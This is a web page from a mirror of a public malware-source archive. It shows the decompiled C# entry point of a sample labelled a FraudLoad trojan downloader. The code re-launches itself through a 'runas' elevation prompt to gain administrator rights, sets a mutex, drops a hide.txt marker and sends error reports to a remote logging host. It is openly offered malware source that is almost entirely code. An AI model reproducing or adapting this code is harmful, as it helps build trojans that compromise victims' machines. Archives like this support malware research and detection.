ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-26 05:15:28 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan-Downloader/Win32/F/Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8/Program.cs

117 lines
3.9 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: mute.Program
// Assembly: explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 772D6407-3F7F-4A01-A630-EF8C6D749DE8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;
using System.Web;
using System.Windows.Forms;
namespace mute
{
internal static class Program
{
[DllImport("kernel32")]
private static extern int SetUnhandledExceptionFilter(Program.CallBack cb);
public static int newexceptionfilter(ref long a) => 1;
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool TerminateProcess(IntPtr hProcess, uint uExitCode);
public static bool IsAdministrator()
{
WindowsIdentity current = WindowsIdentity.GetCurrent();
return null != current && new WindowsPrincipal(current).IsInRole(WindowsBuiltInRole.Administrator);
}
[STAThread]
private static void Main()
{
if (Path.GetDirectoryName(Application.ExecutablePath) != Application.UserAppDataPath && !Program.IsAdministrator())
{
Process.Start(new ProcessStartInfo()
{
FileName = Application.ExecutablePath,
Verb = "runas"
});
}
else
{
Thread.Sleep(5000);
bool createdNew;
Mutex mutex = new Mutex(true, Application.ProductName, out createdNew);
if (!createdNew)
return;
System.IO.File.WriteAllText(Path.Combine(Application.UserAppDataPath, "hide.txt"), "empty");
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
try
{
Application.Run((Form) new Form1());
}
catch (Exception ex1)
{
string str = string.Format("Unhandled Exception Raised:{0}", (object) ex1.Message);
WebClient webClient = new WebClient();
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
try
{
webClient.DownloadString(address);
}
catch (Exception ex2)
{
int num = (int) MessageBox.Show(str);
}
}
finally
{
mutex.ReleaseMutex();
}
}
}
private static void ThreadHandler(object sender, ThreadExceptionEventArgs args)
{
string str = string.Format("Unhandled Exception Raised:{0}", (object) args.Exception.Message);
WebClient webClient = new WebClient();
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
try
{
webClient.DownloadString(address);
}
catch (Exception ex)
{
int num = (int) MessageBox.Show(str);
}
Application.Exit();
}
private static void MyHandler(object sender, UnhandledExceptionEventArgs args)
{
string str = string.Format("Unhandled Exception Raised:{0}", (object) ((Exception) args.ExceptionObject).Message);
WebClient webClient = new WebClient();
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
try
{
webClient.DownloadString(address);
}
catch (Exception ex)
{
int num = (int) MessageBox.Show(str);
}
Application.Exit();
}
public delegate int CallBack(ref long a);
}
}
Reference in New Issue Copy Permalink